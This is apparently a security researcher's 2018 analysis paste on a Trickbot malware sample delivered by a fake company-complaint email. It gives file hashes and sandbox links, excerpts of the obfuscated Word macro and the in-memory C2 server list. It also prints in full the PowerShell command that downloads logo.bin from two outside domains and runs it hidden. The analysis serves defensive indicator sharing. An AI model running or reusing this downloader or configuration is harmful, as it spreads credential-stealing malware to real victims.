2018-06-04 #Trickbot sample malware

1. found by @neonprimetime security
2. #trickbot
3. same as this article https://myonlinesecurity.co.uk/yet-another-fake-companies-house-fw-company-complaint-3290749822-delivers-trickbot/
4. https://www.joesandbox.com/analysis/61724/0/html
5.  
6. Subject: FW: Company Complaint #xxxxxx
7. Attachment: xxxxxx.doc
8.  
9. 507542d2ebb235941b3fbbb72f11950f
10. https://www.hybrid-analysis.com/sample/1fe32e3850e1ddd03e0415b2989d6f2751e276231d4bcded2c2d43f88057416c?environmentId=120
11.  
12. dropped
13. logo.exe
14. 8CD3BA008C93327369B3D50341DB8F74
15. https://www.hybrid-analysis.com/sample/9d98f1ce5d7abb69a84d7224f44837f090f95d811c12d45173b529bf77bb3d9c?environmentId=100
16.  
17. ------------
18. downloader commands run
19. ------------
20. cmd.exe /c PowerShell "'PowerShell ""function Zupwjwbz1([String] $jdknrwstldt){(New-Object System.Net.WebClient).DownloadFile($jdknrwstldt,''%TEMP%\mlodfhqs_w.exe'');Start-Process ''%TEMP%\mlodfhqs_w.exe'';}try{Zupwjwbz1(''http://carasaan.com/logo.bin'')}catch{Zupwjwbz1(''http://tvboxaddons.com/logo.bin'')}'"" | Out-File -encoding ASCII -FilePath %TEMP%\Sg_ho1.bat;Start-Process '%TEMP%\Sg_ho1.bat' -WindowStyle Hidden"
21.  
22. ------------
23. interesting macro code
24. ------------
25. Function henderss()
26. henderss = wwwpasswd.yb121212
27. End Function
28.  
29. Function tester198()
30. tester198 = wwwpasswd.chewlang
31. End Function
32.  
33. Sub oodwin1234(kimpickle)
34. tataskelt = "Run"
35. embrocate = 0
36. azinepli = True
37. diecasts = 52 - 72
38. CallByName kimpickle, tataskelt, VbMethod, vogotave.ympmeoha, embrocate, azinepli
39. diecasts = 91 - 60 * diecast
40. diecasts = 70 + 6
41. diecasts = 3 + 72 - diecasts - 73 - diecast
42. End Sub
43.  
44.  
45. --------------------
46. interesting in memory strings
47. --------------------
48. 0x2e208c (1736): <mcconf><ver>1000200</ver><gtag>ser0530</gtag><servs><srv>109.86.227.152:443</srv><srv>185.129.78.167:443</srv><srv>190.4.189.129:443</srv><srv>103.228.142.14:443</srv><srv>65.30.201.40:443</srv><srv>66.232.212.59:443</srv><srv>80.53.57.146:443</srv><srv>208.75.117.70:449</srv><srv>92.55.251.211:449</srv><srv>94.112.52.197:449</srv><srv>209.121.142.202:449</srv><srv>5.102.177.205:449</srv><srv>209.121.142.214:449</srv><srv>95.161.180.42:449</srv><srv>185.42.192.194:449</srv><srv>107.144.49.162:443</srv><srv>46.72.175.17:449</srv><srv>144.48.51.8:443</srv><srv>46.243.179.212:449</srv><srv>82.146.59.174:443</srv><srv>82.146.58.44:443</srv><srv>82.146.42.89:443</srv><srv>82.202.221.207:443</srv><srv>185.146.156.38:443</srv><srv>195.161.114.57:443</srv></servs><autorun><module name="systeminfo" ctl="GetSystemInfo"/><module name="injectDll"/></autorun></mcconf>
49. 0x2f3ba0 (26): 208.75.117.70
50. 0x2f4bb0 (91): https://208.75.117.70:449/ser0530/[REDACTED INFO]/5/spk/
51. 0x40004d (29): !This is a PE executable